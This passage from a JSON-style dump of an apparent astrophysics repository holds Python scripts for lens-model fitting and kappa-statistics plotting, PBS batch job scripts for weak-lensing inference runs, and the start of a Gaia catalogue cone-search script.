\"%.6e\" % (abs(np.random.normal(7,2))) + string(hostlens[line - 1]) # beta1\r\n line = 34; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(1.2,0.3))) + stringunit(hostlens[line - 1]) # FWHM2\r\n line = 35; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(0.1,0.05))) + string(hostlens[line - 1]) # e2\r\n line = 36; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (np.random.uniform(0,360)) + stringunit(hostlens[line - 1]) # PA2\r\n line = 37; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(2,1))) + string(hostlens[line - 1]) # beta2\r\n line = 38; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (np.random.uniform(0.001,0.999)) + \" \" + hostlens[line - 1].split()[2] + \" \" + hostlens[line - 1].split()[3] + \" # flux1 / (flux1 + flux 2) \\n\"\r\n line = 39; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (np.random.normal(0,10)) + stringunit(hostlens[line - 1]) # sky\r\n# point source\r\n line = 43; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(78.8,1))) + stringunit(hostlens[line - 1]) # x\r\n line = 44; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(41.0,1))) + stringunit(hostlens[line - 1]) # y\r\n line = 50; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(5.0e+06,1.0e+06))) + stringunit(hostlens[line - 1]) # flux_point\r\n line = 54; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(83.4,1))) + stringunit(hostlens[line - 1]) # x\r\n line = 55; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(43.6,1))) + stringunit(hostlens[line - 1]) # y\r\n line = 61; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(6.0e+06,1.0e+06))) + stringunit(hostlens[line - 1]) # flux_point\r\n line = 65; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(83.4,1))) + stringunit(hostlens[line - 1]) # x\r\n line = 66; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(43.6,1))) + stringunit(hostlens[line - 1]) # y\r\n line = 72; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(3.0e+06,1.0e+06))) + stringunit(hostlens[line - 1]) # flux_point\r\n line = 76; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(85.0,1))) + stringunit(hostlens[line - 1]) # x\r\n line = 77; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(30.7,1))) + stringunit(hostlens[line - 1]) # y\r\n line = 83; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(6.0e+05,3.0e+05))) + stringunit(hostlens[line - 1]) # flux_point\r\n# galaxy\r\n line = 87; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(84.5,1))) + stringunit(hostlens[line - 1]) # x\r\n line = 88; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(34.5,1))) + stringunit(hostlens[line - 1]) # y\r\n line = 89; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(1.0e+05,1.0e+05))) + stringunit(hostlens[line - 1]) # flux_galaxy\r\n #line = 92; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(0.5,0.2))) + stringunit(hostlens[line - 1]) # re\r\n\r\n with open(file, 'w') as f:\r\n f.writelines(hostlens)\r\n f.close()\r\n\r\n os.system(\"hostlens %s\" % file)\r\n\r\nchi = np.zeros(vary)\r\n\r\nfor i in range(vary):\r\n with open(prefix_out + str(i + 1) + \"_optresult.dat\", 'r') as f:\r\n hostlens = f.readlines()\r\n j = np.shape(hostlens)[0]\r\n while \"chi^2/nu\" not in hostlens[j - 1]: j -= 1\r\n chi[i] = float(hostlens[j - 1].split()[4])\r\n\r\nsave = np.where(chi == np.min(chi))[0][0] + 1\r\nfor i in range(vary):\r\n if i + 1 != save:\r\n os.system(\"rm %s%s_file.input\" % (prefix_out,str(i + 1)))\r\n os.system(\"rm %s%s_optresult.dat\" % (prefix_out,str(i + 1)))\r\n os.system(\"rm %s%s_subtract.fits\" % (prefix_out,str(i + 1)))\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.5815498232841492, "alphanum_fraction": 0.6885609030723572, "avg_line_length": 51.153846740722656, "blob_id": "ced54cb774a15bc5cde4dc1d2db3f05ec987897c", "content_id": "4d90a94ac76feee5a0027d15b41162e2a4f684b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1355, "license_type": "no_license", "max_line_length": 158, "num_lines": 26, "path": "/python/tabsampmed.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "import numpy as np\nimport os\nfrom os import system\ntab_gal=np.loadtxt('GGL_los_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63_pdzmstar_noJHKs_B1608_tab_size120_i24_ratioquick.lst',usecols=[6], unpack=True)\ntab_oneoverr=np.loadtxt('GGL_los_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63_pdzmstar_noJHKs_B1608_tab_size120_i24_ratioquick.lst',usecols=[8], unpack=True)\ntab_massoverr=np.loadtxt('GGL_los_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63_pdzmstar_noJHKs_B1608_tab_size120_i24_ratioquick.lst',usecols=[24], unpack=True)\ntab_zoverr=np.loadtxt('GGL_los_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63_pdzmstar_noJHKs_B1608_tab_size120_i24_ratioquick.lst',usecols=[22], unpack=True)\ntab_mass3=np.loadtxt('GGL_los_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63_pdzmstar_noJHKs_B1608_tab_size120_i24_ratioquick.lst',usecols=[18], unpack=True)\nos.system(\"rm tab_24.lst\")\nv = np.zeros(100)\nw = np.zeros(100)\nx = np.zeros(100)\ny = np.zeros(100)\nz = np.zeros(100)\nfor i in range(len(tab_massoverr)/100):\n for j in range(100):\n v[j]=tab_gal[i*100+j]\n w[j]=tab_oneoverr[i*100+j]\n x[j]=tab_massoverr[i*100+j]\n y[j]=tab_zoverr[i*100+j]\n z[j]=tab_mass3[i*100+j]\n f=open('tab_24.lst','a')\n f.write('%s %s %s %s %s \\n' %(np.median(v),np.median(w),np.median(x),np.median(y),np.median(z)))\n f.close()\n if i%1000==0:\n print i" }, { "alpha_fraction": 0.6048252582550049, "alphanum_fraction": 0.7191739678382874, "avg_line_length": 82.59217834472656, "blob_id": "3c040709f0966ee0c3b586be426aa1c9f9be2de1", "content_id": "38e3b2f3b83e83695e634ca333ea16cf19cb62f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14963, "license_type": "no_license", "max_line_length": 218, "num_lines": 179, "path": "/python/plot_utilities/plotkappa_compareSAHerniques.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\n\nmin_kappa = -0.20\nmax_kappa = 1\n#min_kappa_plot = -0.1\n#max_kappa_plot = 0.15\nbin_stat = 2000\nhalfwidth = (max_kappa - min_kappa) / (bin_stat * 2.0)\n\nroot = \"/Users/cerusu/Dropbox/Davis_work/code/0408/test/\"\n\ndef statistics(kappa_all_,bin_stat_,min_kappa_,max_kappa_):\n a, kappa_values = np.histogram([0], bins = bin_stat_, range=(min_kappa_,max_kappa_)) # create an empty histogram of the correct shape\n\n sum = np.sum(kappa_all_)\n #meanX = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth)) / sum\n #meanX2 = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth) ** 2) / sum\n #std = np.sqrt(meanX2 - meanX**2)\n\n med = 0\n i = 0\n ok = False\n while (med <= sum/2.0) and (ok == False):\n med = med + kappa_all_[i]\n if med > sum/2.0:\n median = kappa_values[i] + halfwidth\n ok = True\n if med == sum/2.0:\n median = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n\n std = 0\n ok = False\n i = 0\n while (std <= sum * 0.16) and (ok == False):\n std = std + kappa_all_[i]\n if std > sum * 0.16:\n std1_ = kappa_values[i] + halfwidth\n ok = True\n if med == sum*0.16:\n std1_ = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n\n std = 0\n ok = False\n i = 0\n while (std <= sum*0.84) and (ok == False):\n std = std + kappa_all_[i]\n if std > sum*0.84:\n std1 = kappa_values[i] + halfwidth\n ok = True\n if med == sum*0.84:\n std1 = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n\n stddev = (std1 - std1_) / 2\n\n return median,stddev,kappa_values\n\nkappa_45_1_z1 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_22.5_med_increments2_zeta1.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_z1,stddev0,kappa_values = statistics(kappa_45_1_z1,bin_stat,min_kappa,max_kappa)\nkappa_45_1_z2 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_22.5_med_increments2_zeta2.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_z2,stddev0,kappa_values = statistics(kappa_45_1_z2,bin_stat,min_kappa,max_kappa)\nkappa_45_1_z05 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_22.5_med_increments2_zeta05.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_z05,stddev0,kappa_values = statistics(kappa_45_1_z05,bin_stat,min_kappa,max_kappa)\n\nkappa_45_1_z1_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_22.5_med_increments2Henriques_zeta1.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_z1_H,stddev0,kappa_values = statistics(kappa_45_1_z1_H,bin_stat,min_kappa,max_kappa)\nkappa_45_1_z2_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_22.5_med_increments2Henriques_zeta2.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_z2_H,stddev0,kappa_values = statistics(kappa_45_1_z2_H,bin_stat,min_kappa,max_kappa)\nkappa_45_1_z05_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_22.5_med_increments2Henriques_zeta05.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_z05_H,stddev0,kappa_values = statistics(kappa_45_1_z05_H,bin_stat,min_kappa,max_kappa)\n\nkappa_45_1_1r_z1 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_oneoverr_22.5_med_increments2_2_zeta1.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_1r_z1,stddev0,kappa_values = statistics(kappa_45_1_1r_z1,bin_stat,min_kappa,max_kappa)\nkappa_45_1_1r_z2 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_oneoverr_22.5_med_increments2_2_zeta2.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_1r_z2,stddev0,kappa_values = statistics(kappa_45_1_1r_z2,bin_stat,min_kappa,max_kappa)\nkappa_45_1_1r_z05 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_oneoverr_22.5_med_increments2_2_zeta05.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_1r_z05,stddev0,kappa_values = statistics(kappa_45_1_1r_z05,bin_stat,min_kappa,max_kappa)\n\nkappa_45_1_1r_z1_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_oneoverr_22.5_med_increments2_2Henriques_zeta1.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_1r_z1_H,stddev0,kappa_values = statistics(kappa_45_1_1r_z1_H,bin_stat,min_kappa,max_kappa)\nkappa_45_1_1r_z2_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_oneoverr_22.5_med_increments2_2Henriques_zeta2.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_1r_z2_H,stddev0,kappa_values = statistics(kappa_45_1_1r_z2_H,bin_stat,min_kappa,max_kappa)\nkappa_45_1_1r_z05_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_oneoverr_22.5_med_increments2_2Henriques_zeta05.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_1r_z05_H,stddev0,kappa_values = statistics(kappa_45_1_1r_z05_H,bin_stat,min_kappa,max_kappa)\n\nkappa_45_1_zr_z1 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_zoverr_22.5_med_increments2_2_zeta1.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_zr_z1,stddev0,kappa_values = statistics(kappa_45_1_zr_z1,bin_stat,min_kappa,max_kappa)\nkappa_45_1_zr_z2 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_zoverr_22.5_med_increments2_2_zeta2.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_zr_z2,stddev0,kappa_values = statistics(kappa_45_1_zr_z2,bin_stat,min_kappa,max_kappa)\nkappa_45_1_zr_z05 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_zoverr_22.5_med_increments2_2_zeta05.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_zr_z05,stddev0,kappa_values = statistics(kappa_45_1_zr_z05,bin_stat,min_kappa,max_kappa)\n\nkappa_45_1_zr_z1_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_zoverr_22.5_med_increments2_2Henriques_zeta1.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_zr_z1_H,stddev0,kappa_values = statistics(kappa_45_1_zr_z1_H,bin_stat,min_kappa,max_kappa)\nkappa_45_1_zr_z2_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_zoverr_22.5_med_increments2_2Henriques_zeta2.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_zr_z2_H,stddev0,kappa_values = statistics(kappa_45_1_zr_z2_H,bin_stat,min_kappa,max_kappa)\nkappa_45_1_zr_z05_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_zoverr_22.5_med_increments2_2Henriques_zeta05.cat\" % root, usecols=[0], unpack=True)\nmedian_45_1_zr_z05_H,stddev0,kappa_values = statistics(kappa_45_1_zr_z05_H,bin_stat,min_kappa,max_kappa)\n\nkappa_120_1_z1 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_22.5_med_increments2_zeta1.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_z1,stddev0,kappa_values = statistics(kappa_120_1_z1,bin_stat,min_kappa,max_kappa)\nkappa_120_1_z2 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_22.5_med_increments2_zeta2.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_z2,stddev0,kappa_values = statistics(kappa_120_1_z2,bin_stat,min_kappa,max_kappa)\nkappa_120_1_z05 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_22.5_med_increments2_zeta05.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_z05,stddev0,kappa_values = statistics(kappa_120_1_z05,bin_stat,min_kappa,max_kappa)\n\nkappa_120_1_z1_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_22.5_med_increments2Henriques_zeta1.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_z1_H,stddev0,kappa_values = statistics(kappa_120_1_z1_H,bin_stat,min_kappa,max_kappa)\nkappa_120_1_z2_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_22.5_med_increments2Henriques_zeta2.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_z2_H,stddev0,kappa_values = statistics(kappa_120_1_z2_H,bin_stat,min_kappa,max_kappa)\nkappa_120_1_z05_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_22.5_med_increments2Henriques_zeta05.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_z05_H,stddev0,kappa_values = statistics(kappa_120_1_z05_H,bin_stat,min_kappa,max_kappa)\n\nkappa_120_1_1r_z1 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_oneoverr_22.5_med_increments2_2_zeta1.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_1r_z1,stddev0,kappa_values = statistics(kappa_120_1_1r_z1,bin_stat,min_kappa,max_kappa)\nkappa_120_1_1r_z2 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_oneoverr_22.5_med_increments2_2_zeta2.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_1r_z2,stddev0,kappa_values = statistics(kappa_120_1_1r_z2,bin_stat,min_kappa,max_kappa)\nkappa_120_1_1r_z05 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_oneoverr_22.5_med_increments2_2_zeta05.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_1r_z05,stddev0,kappa_values = statistics(kappa_120_1_1r_z05,bin_stat,min_kappa,max_kappa)\n\nkappa_120_1_1r_z1_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_oneoverr_22.5_med_increments2_2Henriques_zeta1.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_1r_z1_H,stddev0,kappa_values = statistics(kappa_120_1_1r_z1_H,bin_stat,min_kappa,max_kappa)\nkappa_120_1_1r_z2_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_oneoverr_22.5_med_increments2_2Henriques_zeta2.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_1r_z2_H,stddev0,kappa_values = statistics(kappa_120_1_1r_z2_H,bin_stat,min_kappa,max_kappa)\nkappa_120_1_1r_z05_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_oneoverr_22.5_med_increments2_2Henriques_zeta05.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_1r_z05_H,stddev0,kappa_values = statistics(kappa_120_1_1r_z05_H,bin_stat,min_kappa,max_kappa)\n\nkappa_120_1_zr_z1 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_zoverr_22.5_med_increments2_2_zeta1.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_zr_z1,stddev0,kappa_values = statistics(kappa_120_1_zr_z1,bin_stat,min_kappa,max_kappa)\nkappa_120_1_zr_z2 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_zoverr_22.5_med_increments2_2_zeta2.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_zr_z2,stddev0,kappa_values = statistics(kappa_120_1_zr_z2,bin_stat,min_kappa,max_kappa)\nkappa_120_1_zr_z05 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_zoverr_22.5_med_increments2_2_zeta05.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_zr_z05,stddev0,kappa_values = statistics(kappa_120_1_zr_z05,bin_stat,min_kappa,max_kappa)\n\nkappa_120_1_zr_z1_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_zoverr_22.5_med_increments2_2Henriques_zeta1.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_zr_z1_H,stddev0,kappa_values = statistics(kappa_120_1_zr_z1_H,bin_stat,min_kappa,max_kappa)\nkappa_120_1_zr_z2_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_zoverr_22.5_med_increments2_2Henriques_zeta2.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_zr_z2_H,stddev0,kappa_values = statistics(kappa_120_1_zr_z2_H,bin_stat,min_kappa,max_kappa)\nkappa_120_1_zr_z05_H = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_zoverr_22.5_med_increments2_2Henriques_zeta05.cat\" % root, usecols=[0], unpack=True)\nmedian_120_1_zr_z05_H,stddev0,kappa_values = statistics(kappa_120_1_zr_z05_H,bin_stat,min_kappa,max_kappa)\n\nplt.subplot(1,1,1)\nax = plt.subplot(1,1,1)\nax.tick_params(labelsize=15)\nplt.clf()\n#winlen = 12\n\nplt.plot([0.5,1,2],[median_45_1_z05,median_45_1_z1,median_45_1_z2],color='k', linewidth=1, linestyle='-', label ='SA $45: 1$')\nplt.plot([0.5,1,2],[median_45_1_z05_H,median_45_1_z1_H,median_45_1_z2_H],color='k', linewidth=1, linestyle='--', label ='Henriques $45: 1$')\nplt.plot([0.5,1,2],[median_45_1_1r_z05,median_45_1_1r_z1,median_45_1_1r_z2],color='b', linewidth=1, linestyle='-', label ='SA $45: 1+1/r$')\nplt.plot([0.5,1,2],[median_45_1_1r_z05_H,median_45_1_1r_z1_H,median_45_1_1r_z2_H],color='b', linewidth=1, linestyle='--', label ='Henriques $45: 1+1/r$')\nplt.plot([0.5,1,2],[median_45_1_zr_z05,median_45_1_zr_z1,median_45_1_zr_z2],color='r', linewidth=1, linestyle='-', label ='SA $45: 1+z/r$')\nplt.plot([0.5,1,2],[median_45_1_zr_z05_H,median_45_1_zr_z1_H,median_45_1_zr_z2_H],color='r', linewidth=1, linestyle='--', label ='Henriques $45: 1+z/r$')\n\nplt.plot([0.5,1,2],[median_120_1_z05,median_120_1_z1,median_120_1_z2],color='k', linewidth=3, linestyle='-', label ='SA $120: 1$')\nplt.plot([0.5,1,2],[median_120_1_z05_H,median_120_1_z1_H,median_120_1_z2_H],color='k', linewidth=3, linestyle='--', label ='Henriques $120: 1$')\nplt.plot([0.5,1,2],[median_120_1_1r_z05,median_120_1_1r_z1,median_120_1_1r_z2],color='b', linewidth=3, linestyle='-', label ='SA $120: 1+1/r$')\nplt.plot([0.5,1,2],[median_120_1_1r_z05_H,median_120_1_1r_z1_H,median_120_1_1r_z2_H],color='b', linewidth=3, linestyle='--', label ='Henriques $120: 1+1/r$')\nplt.plot([0.5,1,2],[median_120_1_zr_z05,median_120_1_zr_z1,median_120_1_zr_z2],color='r', linewidth=3, linestyle='-', label ='SA $120: 1+z/r$')\nplt.plot([0.5,1,2],[median_120_1_zr_z05_H,median_120_1_zr_z1_H,median_120_1_zr_z2_H],color='r', linewidth=3, linestyle='--', label ='Henriques $120: 1+z/r$')\n\nplt.xlabel(r'$\\zeta$', fontsize=20)\nplt.ylabel(r'median ($\\kappa)$', fontsize=20)\nplt.xticks([0.5,1,2])\nplt.legend(loc=\"upper left\",fontsize=7)\nplt.title(\"SA - Henriques comparison $z_s=2.4$\",fontsize=14)\nplt.savefig('%sSAHenriquescomparison0408.png' % root, dpi=250, bbox_inches='tight')\n" }, { "alpha_fraction": 0.6611374616622925, "alphanum_fraction": 0.7511848211288452, "avg_line_length": 22.44444465637207, "blob_id": "adbc33b1b9e37d4dc1b1f3ecdff75fa98152ecc8", "content_id": "f841ba95912c1cfd6053f71f7162f66e9e935e3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 422, "license_type": "no_license", "max_line_length": 95, "num_lines": 18, "path": "/python/scripts/NAOJ/batch_infer18.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log18.out\n#PBS -e Log18.err\n#PBS -N 18\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappa_unbiasedwithshearincrement2226.py WFI2033 5 45 23 meds gal gamma oneoverr SIS\npython inferkappa_unbiasedwithshear.py WFI2033 5 120 23 meds gal gamma oneoverr SIS\n" }, { "alpha_fraction": 0.686170220375061, "alphanum_fraction": 0.7748227119445801, "avg_line_length": 27.200000762939453, "blob_id": "e88e8320f67d44ac176c897d4297cceb0e2d97c9", "content_id": "c770dadaeec1e35b3f52d2c34554e99a347a9aaa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 564, "license_type": "no_license", "max_line_length": 82, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim9.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log9s.out\n#PBS -e Log9s.err\n#PBS -N 9s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal gamma oneoverr massoverr\npython inferkappasimbias.py WFI2033 5 120 23 meds gal gamma oneoverr massoverr\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal gamma oneoverr massoverr\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal gamma oneoverr massoverr\n" }, { "alpha_fraction": 0.5414499044418335, "alphanum_fraction": 0.5639958381652832, "avg_line_length": 46.26229476928711, "blob_id": "7126992a8b1ccaeb6fcc03c80a610b794a4e2a35", "content_id": "a8a3dbe859f33b80772e29dfbc4fa42aa7c4b2a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2883, "license_type": "no_license", "max_line_length": 237, "num_lines": 61, "path": "/python/catalogue_utilities/GaiaPS1search.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Cone search\nimport numpy as np\nimport astropy.units as u\n\nsearch = \"Gaia\"\n#search = \"PS1\"\n#file = \"/Volumes/LaCieSubaru/Ciprian_candidates/candidatesJan2019.cat\"\n#file = \"/Users/cerusu/OneDrive - Subaru Telescope/candidates.cat\"\nfile = \"/Users/cerusu/Dropbox/clustermostpromising.txt\"\ncat = np.loadtxt(file, usecols = [0,1], unpack=True)\n\nif search == \"Gaia\":\n from astropy.coordinates import SkyCoord\n from astroquery.gaia import Gaia\n #rad = 9.0 # arcsec # used for Gaia\n rad = 20.0 # arcsec\n radius = u.Quantity(rad, u.arcsec)\n #for i in range(1):\n for i in range(len(cat[0])):\n coord = SkyCoord(ra=cat[0][i], dec=cat[1][i], unit=(u.degree, u.degree), frame='icrs')\n j = Gaia.cone_search_async(coord, radius)\n r = j.get_results()\n #print r.columns\n print cat[0][i], cat[1][i]\n print 'dist ra dec G astrom_exc_noise astrom_exc_noise_sig proper_motion_significance'\n for j in range(len(r)):\n #if j ==1: print cat[0][i], cat[1][i], SkyCoord(cat[0][i], cat[1][i], unit='deg').separation(SkyCoord(r[j]['ra'], r[j]['dec'], unit='deg')).arcsec, r[j]['phot_g_mean_mag'],r[j]['phot_bp_mean_mag'],r[j]['phot_rp_mean_mag']\n print 